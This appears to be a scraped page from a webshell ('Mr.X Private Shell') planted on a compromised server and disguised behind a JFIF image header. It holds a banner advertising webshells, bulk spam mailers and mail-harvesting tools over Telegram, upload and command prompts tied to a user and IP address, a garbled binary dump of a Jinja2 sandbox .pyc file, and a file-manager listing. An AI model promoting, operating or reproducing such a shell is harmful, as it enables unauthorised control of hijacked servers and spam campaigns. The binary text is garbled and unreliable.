����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

deexcl@216.73.217.71: ~ $
a

��+b�8�@sUdZddlZddlZddlZddlmZddlmZddlm	Z	ddl
mZddlm
Z
ddlmZd	d
lmZd	dlmZd	dlmZd	d
lmZejdejdejfd�ZdZe�Zejeed<e�Z ejeed<ddhZ!ddhZ"ddhZ#ej$e%gd��fej&e%gd��fej'e%gd��fe	e%gd��ffZ(ej)ej)ej*ej+efdfed<ejej,ed�d d!�Z-e.e/d"�d#d$�Z0eed%�d&d'�Z1ejee2d(�d)d*�Z3ejee2d(�d+d,�Z4Gd-d.�d.e�Z5Gd/d0�d0e5�Z6Gd1d2�d2e�Z7Gd3d4�d4e7e
�Z8dS)5z�A sandbox layer that ensures unsafe operations cannot be performed.
Useful when the template itself comes from an untrusted source.
�N)�formatter_field_name_split)�abc)�deque)�	Formatter)�EscapeFormatter)�Markup�)�Environment)�
SecurityError)�Context)�	Undefined�F.)�boundi���UNSAFE_FUNCTION_ATTRIBUTES�UNSAFE_METHOD_ATTRIBUTES�gi_frame�gi_code�cr_frame�cr_code�ag_code�ag_frame)�add�clear�difference_update�discard�pop�remove�symmetric_difference_update�update)rr�popitem�
setdefaultr)�append�reverse�insert�sort�extendr)	r!�
appendleftrr%�
extendleftr�popleftr�rotate�
_mutable_spec)�callable�returncCs8t|tjtjf�r|jdvr dS|j}t|t�r4|SdS)N)�format�
format_map)�
isinstance�types�
MethodType�BuiltinMethodType�__name__�__self__�str)r+�obj�r7�B/usr/lib/python3.9/site-packages/ansible/_vendor/jinja2/sandbox.py�inspect_format_methodSs��
r9)�argsr,cGs(t|�}t|�tkr$tdt�d���|S)zWA range that can't generate ranges with a length of more than
    MAX_RANGE items.
    z@Range too big. The sandbox blocks ranges larger than MAX_RANGE (z).)�range�len�	MAX_RANGE�
OverflowError)r:�rngr7r7r8�
safe_rangeas��r@)�fr,cCs
d|_|S)z�Marks a function or method as unsafe.

    .. code-block: python

        @unsafe
        def delete(self):
            pass
    T)�unsafe_callable)rAr7r7r8�unsafeps	rC)r6�attrr,cCs�t|tj�r|tvr�dSn�t|tj�r<|tvs6|tvr�dSn�t|t�rT|dkr�dSnzt|tjtjtj	f�rndSt|tj
�r�|tvr�dSnFttd�r�t|tj
�r�|tvr�dSn"ttd�r�t|tj�r�|tvr�dS|�d�S)a�Test if the attribute given is an internal python attribute.  For
    example this function returns `True` for the `func_code` attribute of
    python objects.  This is useful if the environment method
    :meth:`~SandboxedEnvironment.is_safe_attribute` is overridden.

    >>> from jinja2.sandbox import is_internal_attribute
    >>> is_internal_attribute(str, "mro")
    True
    >>> is_internal_attribute(str, "upper")
    False
    T�mro�
CoroutineType�AsyncGeneratorType�__)r/r0�FunctionTyperr1r�type�CodeType�
TracebackType�	FrameType�
GeneratorType�UNSAFE_GENERATOR_ATTRIBUTES�hasattrrF�UNSAFE_COROUTINE_ATTRIBUTESrG�!UNSAFE_ASYNC_GENERATOR_ATTRIBUTES�
startswith)r6rDr7r7r8�is_internal_attribute}s.
�rTcCs(tD]\}}t||�r||vSqdS)a�This function checks if an attribute on a builtin mutable object
    (list, dict, set or deque) or the corresponding ABCs would modify it
    if called.

    >>> modifies_known_mutable({}, "clear")
    True
    >>> modifies_known_mutable({}, "keys")
    False
    >>> modifies_known_mutable([], "append")
    True
    >>> modifies_known_mutable([], "index")
    False

    If called with an unsupported object, ``False`` is returned.

    >>> modifies_known_mutable("foo", "upper")
    False
    F)r*r/)r6rDZtypespecrCr7r7r8�modifies_known_mutable�s
rUcs�eZdZUdZdZejejejej	ej
ejejd�Z
ejeejejejgejffed<ejejd�Zejeejejgejffed<e�Zejeed<e�Zejeed<ejejd	d
��fdd�Zejeejed
�dd�Zejed�dd�Zeeejejejd�dd�Z eeejejd�dd�Z!ejej"eejfej"eje#fd�dd�Z$ejeej"eje#fd�dd�Z%ejee#d�dd �Z&d(eej'ejd!fejeejfej(ejed"�d#d$�Z)eejejejejd%�d&d'�Z*�Z+S))�SandboxedEnvironmenta�The sandboxed environment.  It works like the regular environment but
    tells the compiler to generate sandboxed code.  Additionally subclasses of
    this environment may override the methods that tell the runtime what
    attributes or functions are safe to access.

    If the template tries to access insecure code a :exc:`SecurityError` is
    raised.  However also other exceptions may occur during the rendering so
    the caller has to ensure that all exceptions are caught.
    T)�+�-�*�/z//z**�%�default_binop_table)rWrX�default_unop_table�intercepted_binops�intercepted_unopsN)r:�kwargsr,cs8t�j|i|��t|jd<|j��|_|j��|_dS)Nr;)	�super�__init__r@�globalsr\�copy�binop_tabler]�
unop_table)�selfr:r`��	__class__r7r8rb�s
zSandboxedEnvironment.__init__�r6rD�valuer,cCs|�d�pt||�S)aYThe sandboxed environment will call this method to check if the
        attribute of an object is safe to access.  Per default all attributes
        starting with an underscore are considered private as well as the
        special attributes of internal python objects as returned by the
        :func:`is_internal_attribute` function.
        �_)rSrT�rgr6rDrkr7r7r8�is_safe_attributesz&SandboxedEnvironment.is_safe_attribute)r6r,cCst|dd�pt|dd�S)z�Check if an object is safely callable. By default callables
        are considered safe unless decorated with :func:`unsafe`.

        This also recognizes the Django convention of setting
        ``func.alters_data = True``.
        rBFZalters_data)�getattr)rgr6r7r7r8�is_safe_callables�z%SandboxedEnvironment.is_safe_callable)�context�operator�left�rightr,cCs|j|||�S)z�For intercepted binary operator calls (:meth:`intercepted_binops`)
        this function is executed instead of the builtin operator.  This can
        be used to fine tune the behavior of certain operators.

        .. versionadded:: 2.6
        )re)rgrqrrrsrtr7r7r8�
call_binops	zSandboxedEnvironment.call_binop)rqrr�argr,cCs|j||�S)z�For intercepted unary operator calls (:meth:`intercepted_unops`)
        this function is executed instead of the builtin operator.  This can
        be used to fine tune the behavior of certain operators.

        .. versionadded:: 2.6
        )rf)rgrqrrrvr7r7r8�	call_unop!szSandboxedEnvironment.call_unop)r6�argumentr,cCs�z
||WSttfy�t|t�r�zt|�}WntyDYnJ0zt||�}WntyfYn(0|�|||�r~|YS|�||�YSYn0|j	||d�S)z(Subscribe an object from sandboxed code.�r6�name)
�	TypeError�LookupErrorr/r5�	Exceptionro�AttributeErrorrn�unsafe_undefined�	undefined)rgr6rxrDrkr7r7r8�getitem*s 

zSandboxedEnvironment.getitem)r6�	attributer,cCstzt||�}Wn8tyFz||WYSttfy@Yn0Yn 0|�|||�rZ|S|�||�S|j||d�S)z�Subscribe an object from sandboxed code and prefer the
        attribute.  The attribute passed *must* be a bytestring.
        ry)ror~r{r|rnrr�)rgr6r�rkr7r7r8roAszSandboxedEnvironment.getattrcCs&|jd|�dt|�j�d�||td�S)z1Return an undefined object for unsafe attributes.zaccess to attribute z of z object is unsafe.)rzr6�exc)r�rJr3r
)rgr6r�r7r7r8rRs��z%SandboxedEnvironment.unsafe_undefined.)�sr:r`�format_funcr,cCs�t|t�rt||jd�}nt|�}|durl|jdkrlt|�dksD|r`tdt|�|du�d���|d}d}|�|||�}t	|�|�S)	z�If a format call is detected, then this is routed through this
        method so that our safety sandbox can be used for it.
        )�escapeNr.rz(format_map() takes exactly one argument z givenrr7)
r/r�SandboxedEscapeFormatterr��SandboxedFormatterr3r<r{ZvformatrJ)rgr�r:r`r��	formatter�rvr7r7r8�
format_string\s
��z"SandboxedEnvironment.format_string)�_SandboxedEnvironment__context�_SandboxedEnvironment__objr:r`r,cOsPt|�}|dur |�||||�S|�|�s8t|�d���|j|g|�Ri|��S)z#Call an object from sandboxed code.Nz is not safely callable)r9r�rpr
�call)Z_SandboxedEnvironment__selfr�r�r:r`�fmtr7r7r8r�ys
zSandboxedEnvironment.call)N),r3�
__module__�__qualname__�__doc__Z	sandboxedrrr�sub�mul�truediv�floordiv�pow�modr\�t�Dictr5�Callable�Any�__annotations__�pos�negr]�	frozensetr^�	FrozenSetr_rb�boolrnrprrurw�Unionrr�ror�Tuple�Optionalr�r��
__classcell__r7r7rhr8rV�sR

�,�(	�
� �
��rVcs0eZdZdZejeejed��fdd�Z�Z	S)�ImmutableSandboxedEnvironmentz�Works exactly like the regular `SandboxedEnvironment` but does not
    permit modifications on the builtin mutable objects `list`, `set`, and
    `dict` by using the :func:`modifies_known_mutable` function.
    rjcs t��|||�sdSt||�S)NF)rarnrUrmrhr7r8rn�sz/ImmutableSandboxedEnvironment.is_safe_attribute)
r3r�r�r�r�r�r5r�rnr�r7r7rhr8r��sr�cs\eZdZeejdd��fdd�Zeejejej	eejfej
ejefd�dd�Z�ZS)r�N)�envr`r,cs||_t�jfi|��dS�N)�_envrarb)rgr�r`rhr7r8rb�szSandboxedFormatter.__init__)�
field_namer:r`r,c	CsRt|�\}}|�|||�}|D]*\}}|r:|j�||�}q|j�||�}q||fSr�)rZ	get_valuer�ror�)	rgr�r:r`�first�restr6Zis_attr�ir7r7r8�	get_field�szSandboxedFormatter.get_field)
r3r�r�r	r�r�rbr5�Sequence�Mappingr�r�r�r7r7rhr8r��s�r�c@seZdZdS)r�N)r3r�r�r7r7r7r8r��sr�)9r�rrr0�typingr�Z_stringr�collectionsrr�stringrZ
markupsaferrZenvironmentr	�
exceptionsr
Zruntimerr�TypeVarr�r�r
r=�setr�Setr5r�rrOrQrR�
MutableSetr��MutableMapping�MutableSequencer*r��Typer�r�r9�intr;r@rCr�rTrUrVr�r�r�r7r7r7r8�<module>s^��
�
����(+
%R


Filemanager

Name Type Size Permission Actions
__init__.cpython-39.opt-1.pyc File 1.55 KB 0644
__init__.cpython-39.pyc File 1.55 KB 0644
_identifier.cpython-39.opt-1.pyc File 2.01 KB 0644
_identifier.cpython-39.pyc File 2.01 KB 0644
async_utils.cpython-39.opt-1.pyc File 2.58 KB 0644
async_utils.cpython-39.pyc File 2.58 KB 0644
bccache.cpython-39.opt-1.pyc File 13.56 KB 0644
bccache.cpython-39.pyc File 13.56 KB 0644
compiler.cpython-39.opt-1.pyc File 52.85 KB 0644
compiler.cpython-39.pyc File 52.89 KB 0644
constants.cpython-39.opt-1.pyc File 1.49 KB 0644
constants.cpython-39.pyc File 1.49 KB 0644
debug.cpython-39.opt-1.pyc File 3.87 KB 0644
debug.cpython-39.pyc File 3.87 KB 0644
defaults.cpython-39.opt-1.pyc File 1.29 KB 0644
defaults.cpython-39.pyc File 1.29 KB 0644
environment.cpython-39.opt-1.pyc File 51.44 KB 0644
environment.cpython-39.pyc File 51.85 KB 0644
exceptions.cpython-39.opt-1.pyc File 5.43 KB 0644
exceptions.cpython-39.pyc File 5.43 KB 0644
ext.cpython-39.opt-1.pyc File 24.92 KB 0644
ext.cpython-39.pyc File 24.92 KB 0644
filters.cpython-39.opt-1.pyc File 49.09 KB 0644
filters.cpython-39.pyc File 49.2 KB 0644
idtracking.cpython-39.opt-1.pyc File 10.77 KB 0644
idtracking.cpython-39.pyc File 10.81 KB 0644
lexer.cpython-39.opt-1.pyc File 19.67 KB 0644
lexer.cpython-39.pyc File 19.77 KB 0644
loaders.cpython-39.opt-1.pyc File 19.81 KB 0644
loaders.cpython-39.pyc File 19.94 KB 0644
meta.cpython-39.opt-1.pyc File 3.69 KB 0644
meta.cpython-39.pyc File 3.69 KB 0644
nativetypes.cpython-39.opt-1.pyc File 4.83 KB 0644
nativetypes.cpython-39.pyc File 4.83 KB 0644
nodes.cpython-39.opt-1.pyc File 39.78 KB 0644
nodes.cpython-39.pyc File 39.9 KB 0644
optimizer.cpython-39.opt-1.pyc File 1.87 KB 0644
optimizer.cpython-39.pyc File 1.87 KB 0644
parser.cpython-39.opt-1.pyc File 26.91 KB 0644
parser.cpython-39.pyc File 26.91 KB 0644
runtime.cpython-39.opt-1.pyc File 31.37 KB 0644
runtime.cpython-39.pyc File 31.4 KB 0644
sandbox.cpython-39.opt-1.pyc File 11.62 KB 0644
sandbox.cpython-39.pyc File 11.62 KB 0644
tests.cpython-39.opt-1.pyc File 6.4 KB 0644
tests.cpython-39.pyc File 6.4 KB 0644
utils.cpython-39.opt-1.pyc File 23.95 KB 0644
utils.cpython-39.pyc File 23.95 KB 0644
visitor.cpython-39.opt-1.pyc File 3.81 KB 0644
visitor.cpython-39.pyc File 3.81 KB 0644